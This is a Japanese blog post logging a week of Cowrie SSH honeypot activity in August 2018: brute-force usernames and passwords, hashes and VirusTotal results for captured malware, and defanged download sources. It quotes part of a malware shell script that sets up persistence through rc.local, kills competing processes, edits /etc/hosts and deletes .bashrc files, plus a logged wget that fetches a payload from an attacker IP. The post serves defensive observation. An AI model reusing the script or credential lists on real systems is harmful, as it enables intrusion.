ハニーポットの観測記録

ハニーポッターすぎたむちのぶろぐ

ハニーポット観察日記【4】

Cowrie運用7日目の簡易調査報告です。

ダッシュボードと集計結果

ダッシュボード
※集計期間:2018/08/12~2018/08/18
f:id:SugitaMuchi:20180818103549p:plain f:id:SugitaMuchi:20180818103552p:plain


■ログイン試行回数( username )
※集計期間:2018/08/12~2018/08/18

試行回数 username
68 root
40 pi
14 admin
4 user
3 sysadmin
2 ubnt
2 cloudera
2 sconsole
1 nexthink
1 nao
1 misp
1 localadomin
1 geosolutions
1 enisa
1 device
1 demo
1 debian
1 apc
1 Administrator

■ログイン試行回数( password )
※集計期間:2018/08/12~2018/08/18

試行回数 password
35 root
20 raspberryraspberry993311
20 raspberry
13 root1234
13 admin
4 1
3 123456
2 video
2 ubnt
2 linux
2 cloudera
2 apc
2 PASS
1 wubao
1 unitrends1
1 ubuntu1404
1 debian
1 toor
1 sixaola
1 password
1 palosanto
1 openelec
1 nas4free
1 nao
1 max2play
1 login
1 localadmin
1 libreelec
1 indigo
1 fai
1 enisa
1 Vision2
1 Password1234
1 NM1$88
1 Geos
1 12345


集計結果を見る限りだと、ほぼいつも通りって感じですが、
8/13の21:00から22:00にかけてGermay / Ulmからの
アタックが多かったかな~?という印象。
使用されていたユーザ名 / パスワードは以下になります。
admin / admin , root / root , ubnt / ubnt

あと、全体的にはpi / raspberrypi / raspberryraspberry993311が多いですね。
そういえば、恥ずかしながらラズパイ触ったことないです。


ダウンロードされたファイルについて

■ダウンロードされたファイル情報
※収集期間:2018/08/12~2018/08/18
全部で11ファイルとなりました。

24li: 73dd71e43ed0c394739629d95ebc977f886c39402c8a06782cd70bb383b8e28e: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
26li: 402472fe334a693080d40710e2f05ab51fb363c1f21c8e3f438baa8a712ce323: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
26li: b02ed4180fff81e28d6348be302c22f8549b2c544aa8b7f02ba62be4ed289d19: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
Air: 21fa241410cff0b1262881af2a0c1a1924502de69dd9599fe3c711d8c5221624: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
RXVbgaPF: b33b30c3cc7e027320e4d203303cc36a4e84b44451278bbb524ec54d5f61a4d6: ASCII text, with very long lines
daemon.armv4l.mod: b986a2795479b4aacf6dafa6654914ca11d9b4a260a35f1369e262f4e948e841: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
daemon.i686.mod: 5f511d1c54e4ee26ebe4f5793a8e064a418d10d52a43d886de32020ea4c9c664: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
daemon.mips.mod: 2f1f43d59dfc7d13b32165f2328dc1176b75021e3ee8d97ad0df33aa803432f5: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
daemon.mips.mod: e14264ea8afb49f6ca91f57226462e526ecf4f9d6af0784e92ea72c66a1839a1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
test.mod: db45013d633502575c1bd3eb1688056e89cb1f1bb938f04becc98eaa164165ab: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
wbJsPcgn: 80555461c987303f528794b1e5d159bddcd93342772291bdf1562277101f0c6d: ASCII text, with very long lines

■検出状況
VirusTotalで検索した状況です。
※テーブルにハッシュ値が収まらないので、省略してます。

filename sha256 VirusTotal 備考
24li 73dd71e43e... - -
26li 402472fe33... 検出率: 6 / 59 DDos
26li b02ed4180f... 検出率: 6 / 59 Backdoor / DDos
Air 21fa241410... 検出率: 35 / 59 Backdoor
RXVbgaPF b33b30c3cc... 検出率: 27 / 59 Backdoor
daemon.armv4l.mod b986a27954... 検出率: 32 / 59 Backdoor / Bot / DDos / IoT
daemon.i686.mod 5f511d1c54... 検出率: 1 / 59 Backdoor / Downloader
daemon.mips.mod 2f1f43d59d... 検出率: 17 / 57 Backdoor / Bot / DDos / IoT
daemon.mips.mod e14264ea8a... 検出率: 22 / 58 Backdoor / Bot / DDos / IoT
test.mod db45013d63... 検出率: 10 / 60 Backdoor / Bot / DDos / IoT
wbJsPcgn 80555461c9... 検出率: 17 / 59 Backdoor / Downloader

■ダウンロードされたファイル詳細
バイナリファイルの解析スキルがないため、シェルスクリプトファイルを覗いています。
※悪用されると困るので、冒頭のみ(一部編集・省略)しています。

・ファイル名:RXVbgaPF
・sha256:b33b30c3cc7e027320e4d203303cc36a4e84b44451278bbb524ec54d5f61a4d6

#!/bin/bash

MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG

if [ "$EUID" -ne 0 ]
then
        NEWMYSELF=`mktemp -u 'XXXXXXXX'`
        sudo cp $MYSELF /opt/$NEWMYSELF
        sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
        sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
        sudo sh -c "echo 'exit 0' >> /etc/rc.local"
        sleep 1
        sudo reboot
else
TMP1=`mktemp`
echo $TMP1 >> $DEBUG

killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
killall kaiten
killall perl

echo "127.0.0.1 bins[.]deutschland-zahlung[.]eu" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc


中略


fi

ここまで書いて気がついたのですが、
ファイルRXVbgaPFwbJsPcgnの違いが、最終行に1行空白があるかないかだけ。
検出状況もRXVbgaPF検出率: 27 / 59wbJsPcgn検出率: 17 / 59とわりと差がありました。
ちなみに、セキュリティベンダによっては、検出名が全く違う状況でした。


VirusTotalの検索でヒットしなかったファイルについて
・ファイル名:24li
・sha256:73dd71e43ed0c394739629d95ebc977f886c39402c8a06782cd70bb383b8e28e

ログを確認したところwget hxxp://114[.]64[.]249[.]222/24liにてダウンロードされていました。
後ほど記載しますが、114[.]64[.]249[.]222というのは、
上述した「■ダウンロードされたファイル情報」の26liがダウンロードされる接続先です。


■ダウンロード元
マルウェアが落ちてくるので、絶対に接続しないでください。

2018-08-15T05:41:01 Downloaded URL (hxxp://114[.]64[.]249[.]222/24li) 
2018-08-15T05:49:35 Downloaded URL (hxxp://114[.]64[.]249[.]222/26li) 
2018-08-15T05:54:03 Downloaded URL (hxxp://42[.]51[.]216[.]114:99/Air) 

以上です。